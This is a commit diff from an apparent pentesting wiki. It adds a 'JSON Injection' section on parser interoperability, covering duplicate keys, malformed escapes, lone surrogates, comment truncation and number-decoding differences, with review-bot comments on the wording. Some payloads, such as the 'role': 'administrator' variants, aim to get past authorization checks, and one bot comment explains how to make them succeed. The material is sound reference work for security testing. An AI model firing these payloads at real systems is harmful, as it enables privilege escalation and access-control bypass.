GITBOOK-4429: No subject
carlospolop authored and gitbook-bot committed Nov 12, 2024
1 parent 2a67d6a commit 42b2b7e
Showing 2 changed files with 105 additions and 2 deletions.
2 changes: 1 addition & 1 deletion SUMMARY.md
@@ -604,7 +604,7 @@
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
* [Open Redirect](pentesting-web/open-redirect.md)
* [ORM Injection](pentesting-web/orm-injection.md)
* [Parameter Pollution](pentesting-web/parameter-pollution.md)
* [Parameter Pollution | JSON Injection](pentesting-web/parameter-pollution.md)
* [Phone Number Injections](pentesting-web/phone-number-injections.md)
* [PostMessage Vulnerabilities](pentesting-web/postmessage-vulnerabilities/README.md)
* [Blocking main page to steal postmessage](pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md)
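Review bot: the sidebar title now reads "Parameter Pollution | JSON Injection" while the target stays `pentesting-web/parameter-pollution.md`, so the slug and the title no longer agree and the literal `|` will appear in the navigation; if the JSON parser-interoperability material is meant to be findable on its own, a separate `pentesting-web/json-injection.md` entry next to this one would be clearer than overloading a single link whose path says only parameter pollution.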
105 changes: 104 additions & 1 deletion pentesting-web/parameter-pollution.md
@@ -1,4 +1,4 @@
# Parameter Pollution
# Parameter Pollution | JSON Injection

## Parameter Pollution

@@ -136,11 +136,114 @@ There results were taken from [https://medium.com/@0xAwali/http-parameter-pollut
1. NOT Recognized name\[] .
2. Prefer the last parameter .

## JSON Injection

### Duplicate keys

```ini
obj = {"test": "user", "test": "admin"}
```

The front-end might believe the first ocurrence while the backend uses the second ocurrence of the key.

### Key Collision: Character Truncation and Comments

Certain characters aren't going to be correctly interpreted by the frontend but the backend will interpret them and use those keys, this could be useful to **bypass certain restrictions**:

```json
{"test": 1, "test\[raw \x0d byte]": 2}
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
```

Note how in these cases the front end might think that `test == 1` and the backend will think that `test == 2`.

This can also by used to bypass value restrictions like:

```json
{"role": "administrator\[raw \x0d byte]"}
{"role":"administrator\ud800"}
{"role": "administrator""}
{"role": "admini\strator"}
```

### **Using Comment Truncation**

{% code overflow="wrap" %}
```ini
obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}
```
{% endcode %}

Here we will use the serializer from each parser to view its respective output.

Serializer 1 (e.g., GoLang's GoJay library) will produce:

* `description = "Duplicate with comments"`
* `test = 2`
* `extra = ""`

Serializer 2 (e.g., Java's JSON-iterator library) will produce:

* `description = "Duplicate with comments"`
* `extra = "/*"`
* `extra2 = "*/"`
* `test = 1`

Alternatively, straightforward use of comments can also be effective:

```ini
obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}
```

Java’s GSON library:

```json
{"description":"Comment support","test":1,"extra":"a"}
```

Ruby’s simdjson library:

```json
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}
```

### **Inconsistent Precedence: Deserialization vs. Serialization**

```ini
obj = {"test": 1, "test": 2}

obj["test"] // 1
obj.toString() // {"test": 2}
```

### Float and Integer

The number

```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
```

can be decoded to multiple representations, including:

```undefined
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807
```

Which might create inconsistences

## References

* [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
* [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
* [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
* [https://bishopfox.com/blog/json-interoperability-vulnerabilities](https://bishopfox.com/blog/json-interoperability-vulnerabilities)

<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
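Review bot: the "Key Collision" section (the `{"test": 1, "test\[raw \x0d byte]": 2}` block and the `"role"` block after it) asserts that the frontend sees `test == 1` and the backend `test == 2` without saying what behaviour each side needs for that to happen: the collision only works when one parser silently truncates or drops the bad escape (turning `te\st` into `test`, or cutting `administrator\ud800` at the lone surrogate) while the other keeps the longer key or value, and a strict parser rejects the whole document instead of picking a side. Please state which parsers from the cited Bishop Fox research truncate and which reject, and for the `"role"` examples add that the component doing the authorization check has to accept the unmodified string while the component that consumes it normalises it; otherwise readers will fire these payloads at two strict parsers and conclude the technique is dead. Smaller points in the same hunk: `\[raw \x0d byte]` inside a fenced block renders with the backslashes, so write it as `<raw 0x0d byte>` and say once that a literal carriage return goes there; the blocks under "Duplicate keys", "Using Comment Truncation", "Inconsistent Precedence" and "Float and Integer" are tagged ```ini and ```undefined and should be ```json (or a bare fence where the JSON is deliberately invalid); "Inconsistent Precedence: Deserialization vs. Serialization" has no prose at all, so add a sentence naming which library returns `1` from `obj["test"]` yet re-serialises `{"test": 2}` and why it matters (a gateway that validates the decoded object and forwards the re-encoded string hands a different value downstream); the list of decodings under "Float and Integer" should say which parser yields `0` and which clamps to `9223372036854775807`, since on its own it tells the reader nothing about what to test; and fix the typos "ocurrence" (twice), "can also by used", "inconsistences", and "There results" in the surrounding context line.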
